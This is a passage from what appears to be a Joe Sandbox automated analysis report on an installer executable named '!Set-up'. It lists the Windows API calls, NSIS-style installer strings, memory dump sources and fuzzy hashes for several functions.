                                                               • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$CloseCreateValuewvsprintf
                                                              • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                              • API String ID: 1641139501-220328614
                                                              • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                              • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                              • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                              • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                              APIs
                                                              • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                              • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                              • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                              • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                              • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                              • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                              • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                              • API String ID: 3734993849-3206598305
                                                              • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                              • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                              • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                              • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                              APIs
                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                              • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                              • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                              • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                              • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                              Strings
                                                              • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                              • String ID: created uninstaller: %d, "%s"
                                                              • API String ID: 3294113728-3145124454
                                                              • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                              • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                              • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                              • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427976,759223A0,00000000), ref: 00404FD6
                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FE6
                                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FF9
                                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                              • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                              Strings
                                                              • `G, xrefs: 0040246E
                                                              • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                              • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                              • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                              • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                              • API String ID: 1033533793-4193110038
                                                              • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                              • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                              • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                              • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                              APIs
                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                              • GetSysColor.USER32(00000000), ref: 00403E2C
                                                              • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                              • SetBkMode.GDI32(?,?), ref: 00403E44
                                                              • GetSysColor.USER32(?), ref: 00403E57
                                                              • SetBkColor.GDI32(?,?), ref: 00403E67
                                                              • DeleteObject.GDI32(?), ref: 00403E81
                                                              • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                              • String ID:
                                                              • API String ID: 2320649405-0
                                                              • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                              • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                              • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                              • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                              APIs
                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427976,759223A0,00000000), ref: 00404FD6
                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FE6
                                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FF9
                                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                              • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                              Strings
                                                              • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                              • Exec: success ("%s"), xrefs: 00402263
                                                              • Exec: command="%s", xrefs: 00402241
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                              • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                              • API String ID: 2014279497-3433828417
                                                              • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                              • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                              • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                              • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                              APIs
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                              • GetMessagePos.USER32 ref: 0040489D
                                                              • ScreenToClient.USER32(?,?), ref: 004048B5
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: Message$Send$ClientScreen
                                                              • String ID: f
                                                              • API String ID: 41195575-1993550816
                                                              • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                              • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                              • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                              • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                              APIs
                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                              • MulDiv.KERNEL32(00039800,00000064,00E2D857), ref: 00403295
                                                              • wsprintfW.USER32 ref: 004032A5
                                                              • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                              Strings
                                                              • verifying installer: %d%%, xrefs: 0040329F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                              • String ID: verifying installer: %d%%
                                                              • API String ID: 1451636040-82062127
                                                              • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                              • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                              • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                              • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                              APIs
                                                              • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                              • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                              • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                              • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: Char$Next$Prev
                                                              • String ID: *?|<>/":
                                                              • API String ID: 589700163-165019052
                                                              • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                              • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                              • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                              • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                              APIs
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                              • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                              • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: Close$DeleteEnumOpen
                                                              • String ID:
                                                              • API String ID: 1912718029-0
                                                              • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                              • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
